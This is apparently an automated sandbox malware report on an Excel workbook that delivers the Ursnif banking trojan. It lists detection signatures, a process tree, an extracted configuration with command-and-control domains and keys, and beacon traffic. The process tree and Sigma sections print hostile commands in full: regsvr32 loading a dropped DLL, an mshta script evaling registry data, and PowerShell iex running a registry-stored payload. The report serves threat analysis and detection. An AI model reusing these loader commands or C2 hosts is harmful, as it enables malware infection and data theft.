
Windows Analysis Report documentation_39236.xlsb

Overview

General Information

Sample Name: documentation_39236.xlsb
Analysis ID: 445916
MD5: 31ed7b3f7d7173afe801858e30c0fb62
SHA1: 40376b923682dc858806071f97cb64f781142dbb
SHA256: 8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Sigma detected: Office product drops executable at suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Xls With Macro 4.0

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5056 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 2576 cmdline: regsvr32 -s C:\Users\Public\Documents\decrypt.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5236 cmdline: regsvr32 -s C:\Users\Public\Documents\decrypt.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5008 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4700 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5500 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5944 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1720 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 3128 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3936 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 5780 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1364 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(17 entries in total; first five shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
19.3.regsvr32.exe.56b94a0.2.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
3.3.regsvr32.exe.4d894a0.2.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936
Sigma detected: MSHTA Spawning Windows Shell
                  Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936
Sigma detected: Microsoft Office Product Spawning Windows Shell
                  Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, CommandLine: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5056, ProcessCommandLine: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, ProcessId: 2576
Sigma detected: Mshta Spawning Windows Shell
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936
Sigma detected: Suspicious Csc.exe Source File Folder
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3936, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', ProcessId: 5304
Sigma detected: Non Interactive PowerShell
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936

Data Obfuscation:

Sigma detected: Office product drops executable at suspicious location
Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ProcessId: 5056, TargetFilename: C:\Users\Public\Documents\decrypt.dll

                  Jbx Signature Overview


AV Detection:

Found malware configuration
                  Source: 00000003.00000003.266469751.0000000000530000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com, Virustotal: Detection: 7%
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: unknownHTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2
                  Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
                  Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
                  Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\Public\Documents\decrypt.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: app[1].dll.1.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49761 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49761 -> 165.232.183.49:80
Source: Joe Sandbox View, ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
